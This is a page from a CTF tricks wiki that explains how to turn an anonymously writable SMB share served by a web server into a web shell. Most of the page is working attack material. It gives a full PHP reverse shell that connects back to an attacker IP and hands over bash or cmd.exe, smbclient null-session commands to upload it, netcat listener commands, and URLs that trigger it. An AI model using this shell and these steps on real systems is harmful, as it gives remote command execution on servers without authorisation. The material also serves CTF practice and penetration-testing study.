> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-delivery/writable-share/trick-0258.md).

# SMB Writable Share to Web Shell

***

Exploit a misconfiguration where an SMB share is writable (often anonymously) and its contents are also served by a web server. Upload a web shell script (like a PHP reverse shell) to the share via SMB.

A common tool for this is the PHP reverse shell. An example script looks like this:

```php
<?php
  set_time_limit (0);
  $VERSION = "1.0";
  $ip = 'ATTACKING_IP';  // Change this
  $port = 12345;       // Change this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'bash';
  if (strpos(php_uname(), 'Windows') !== FALSE) {
    $shell = 'cmd.exe';
  }
  $daemon = 0;
  pcntl_signal(SIGCHLD, SIG_IGN);
  pcntl_signal(SIGTSTP, SIG_IGN);
  pcntl_signal(SIGQUIT, SIG_IGN);
  pcntl_signal(SIGTTIN, SIG_IGN);
  pcntl_signal(TTOU, SIG_IGN);
  pcntl_signal(SIGHUP, SIG_IGN);
  pcntl_signal(SIGTERM, SIG_IGN);
  $sock = fsockopen($ip, $port, $errno, $errstr, 3);
  if (!$sock) {
    print "{$errstr} ({$errno})";
    exit(1);
  }
  $descriptorspec = array(
     0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
     1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
     2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );
  $process = proc_open($shell, $descriptorspec, $pipes);
  if (!is_resource($process)) {
    exit(1);
  }
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);
  while (1) {
    if (feof($sock)) {
      break;
    }
    if (feof($pipes[1])) {
      break;
    }
    $read_b = array($sock, $pipes[1], $pipes[2]);
    $num_bytes = stream_select($read_b, $write_a, $error_a, null);
    if (in_array($sock, $read_b)) {
      $input = fread($sock, $chunk_size);
      fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_b)) {
      $output = fread($pipes[1], $chunk_size);
      fwrite($sock, $output);
    }
    if (in_array($pipes[2], $read_b)) {
      $output = fread($pipes[2], $chunk_size);
      fwrite($sock, $output);
    }
  }
  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);
?>
```

Remember to change the `$ip` and `$port` variables within the script to your attacking machine's IP and the port your listener will be on.

Connect to the target SMB share, potentially using a null session if allowed, and upload the file. Use `smbclient` to connect to the share and upload the file:

```bash
smbclient //target.com/writable-share -N -c "put php-reverse-shell.php"
```

*(Replace `target.com/writable-share` and `php-reverse-shell.php` with the actual target and filename)*

An example command to connect to a share named `share` on IP `172.16.1.10` using a null session (`-N`) and then upload a file named `reverse.php` from the attacker's machine (`/root/Desktop/reverse.php`) would be:

```bash
smbclient //172.16.1.10/share -N -c "put /root/Desktop/reverse.php"
```

The `smbclient` command uses an ftp-like syntax. The `put` command is used to transfer a local file to the server. Its basic usage is `put local-file [ remote-file ]`.

Set up a listener on your attack machine to catch the reverse shell connection. Using `netcat`, the command `nc -lvnp` is commonly used for this purpose. Set up a listener on your attack machine to catch the reverse shell connection:

```bash
nc -nlvp 1234
```

*(Replace `1234` with your desired port)*

A common `netcat` command for listening verbosely (`v`), with line-buffered output (`l`), without DNS lookups (`n`), on a specified port (`p`):

```bash
nc -lvnp 1234
```

*(Replace `1234` with your desired port)*\
The `nc` command is used to set up the listener. Common options include:

* `-l`: Listen mode, for inbound connections.
* `-v`: Verbose output, providing more information.
* `-n`: Numeric-only IP addresses, no DNS lookups.
* `-p <port>`: Specify the local port to listen on.

Access the uploaded script via the web server to execute it and trigger the reverse shell. The web path must correspond to the SMB share's location on the web server. Access the uploaded script via the web server to execute it and trigger the reverse shell:

```
http://target.com/web-path-to-share/php-reverse-shell.php
```

*(Replace `target.com/web-path-to-share` with the web-accessible path corresponding to the SMB share)*

For instance, if the uploaded file `reverse.php` is in the `share` directory accessible via the web server on IP `172.16.1.10`, the URL to trigger it would be:

```
http://172.16.1.10/share/reverse.php
```
